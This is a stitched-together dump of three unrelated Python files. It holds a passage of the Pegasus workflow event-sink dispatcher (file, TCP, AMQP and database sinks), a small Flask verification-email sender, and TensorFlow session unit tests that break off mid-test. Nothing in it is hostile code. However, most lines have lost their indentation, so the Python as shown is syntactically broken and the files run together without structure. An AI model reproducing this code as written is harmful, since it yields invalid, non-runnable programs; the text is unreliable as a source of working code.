if dest is None:
return None
    # subset the properties and strip off the prefix only once
if not multiplexed:
sink_props = get_workflow_connect_props(props, db_type)
        # delete pegasus.catalog.workflow.url from our copy; it is re-added below under the default prefix
if "url" in sink_props.keyset():
del sink_props["url"]
sink_props.property("default.url", dest)
else:
sink_props = props
    # PM-898 check whether additional URLs to populate were specified
if not multiplexed and multiplex(dest, prefix, props):
sink_props.property("default.url", dest)
        # remap any property key without a '.' to default.<propname>
for key in sink_props.keyset():
if key.find(".") == -1:
sink_props.property("default." + key, sink_props.property(key))
del sink_props[key]
return MultiplexEventSink(dest, enc, prefix, sink_props, **kw)
url = OutputURL(dest)
log.info("Connecting workflow event sink to %s" % dest)
# Pick an encoder
def pick_encfn(enc_name, namespace):
if enc_name is None or enc_name == "bp":
# NetLogger name=value encoding
encfn = nlapi.Log(level=nlapi.Level.ALL, prefix=namespace)
elif enc_name == "bson":
# BSON
if bson is None:
raise Exception(
"BSON encoding selected, but cannot import bson library"
)
encfn = bson_encode
elif enc_name == "json":
encfn = json_encode
else:
raise ValueError("Unknown encoding '%s'" % (enc_name))
return encfn
# Branch on scheme
if url.scheme == "":
sink = FileEventSink(dest, encoder=pick_encfn(enc, prefix), **kw)
_type, _name = "file", dest
elif url.scheme == "file":
sink = FileEventSink(url.path, encoder=pick_encfn(enc, prefix), **kw)
_type, _name = "file", url.path
elif url.scheme == "x-tcp":
if url.port is None:
url.port = 14380
sink = TCPEventSink(url.host, url.port, encoder=pick_encfn(enc, prefix), **kw)
_type, _name = "network", "{}:{}".format(url.host, url.port)
elif url.scheme in ["amqp", "amqps"]:
# amqp://[USERNAME:PASSWORD@]<hostname>[:port]/[<virtualhost>]/<exchange_name>
if amqp is None:
raise Exception("AMQP destination selected, but cannot import AMQP library")
if url.port is None:
if url.scheme == "amqps":
url.port = 5671 # RabbitMQ default TLS
else:
url.port = 5672 # RabbitMQ default
# PM-1258 parse exchange and virtual host info
exchange = None
virtual_host = None
path_comp = url.path.split("/")
if path_comp is not None:
exchange = path_comp.pop()
if path_comp is not None:
virtual_host = path_comp.pop()
if len(virtual_host) == 0:
virtual_host = None
# PM-1355 set encoder to json always for AMQP endpoints
enc = "json"
sink = AMQPEventSink(
url.host,
url.port,
virtual_host=virtual_host,
exch=exchange,
userid=url.user,
password=url.password,
ssl_enabled=(url.scheme == "amqps"),
encoder=pick_encfn(enc, prefix),
props=sink_props,
**kw,
)
_type, _name = "AMQP", "{}:{}/{}".format(url.host, url.port, url.path)
else:
# load the appropriate DBEvent on basis of prefix passed
sink = DBEventSink(dest, namespace=prefix, props=sink_props, **kw)
_type, _name = "DB", dest
log.info("output type={} namespace={} name={}".format(_type, prefix, _name))
return sink
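# Hedged summary of the dispatch above (these URLs are illustrative examples,
# not values taken from the original code):
#   "events.bp" or "file:///tmp/events.bp"  -> FileEventSink
#   "x-tcp://collector.example.org"         -> TCPEventSink (default port 14380)
#   "amqps://user:pw@host/vhost/exchange"   -> AMQPEventSink over TLS (port 5671)
#   anything else (e.g. "sqlite:///w.db")   -> DBEventSink via the DB loaders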
def multiplex(dest, prefix, props=None):
"""
    Determines whether we need to multiplex events to multiple sinks
    :param dest:
    :param prefix:
    :param props:
:return:
"""
if props is None:
return False
# we never attempt multiplex on dashboard sink
if prefix == DASHBOARD_NS:
return False
additional_sink_props = props.propertyset("pegasus.catalog.workflow" + ".", False)
multiplex = False
for key in additional_sink_props:
if key == "pegasus.catalog.workflow.url":
pass
if key.endswith(".url"):
multiplex = True
break
return multiplex
def get_workflow_connect_props(props, db_type):
"""
Returns connection properties for workflow database
:param props:
:return:
"""
if props is None:
return None
    # first get the default ones specified with the star notation
connect_props = properties.Properties(props.propertyset("pegasus.catalog.*.", True))
prefix = "pegasus.catalog.workflow"
if db_type == connection.DBType.MASTER:
prefix = "pegasus.catalog.dashboard"
    # override these with workflow-specific or dashboard-specific props
addons = props.propertyset(prefix + ".", True)
for key in addons:
connect_props.property(key, addons[key])
return connect_props
|
mailService.py
|
# Remote Services Calls
from threading import Thread
import jwt
from flask import url_for
from flask_mail import Message
from . import app
from . import mail
def send_async(app, msg):
with app.app_context():
mail.send(msg)
def send_verification_mail(recipient, token):
link = url_for('verify_email', token=token, _external=True)
print("USER EMAIL CONFIRMATION LINK: ", link)
msg = Message('Zelite Account Verification', sender="omarosmandev@gmail.com",
recipients=[recipient])
msg.body = 'Click the link below to activate your account ' + link
msg.html = "<h2>Zelite Platform</h2><P>Welcome To Zelite IoT Platform Click activate to verify your account</p> \
<a href={} >activate</a>".format(link)
# mail.send(msg)
Thread(target=send_async, args=(app, msg)).start()
def send_password_reset_mail():
pass
|
session_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray(10.0, dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session():
for dtype in [dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
out_t.eval(feed_dict={feed_t: np_array}))
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
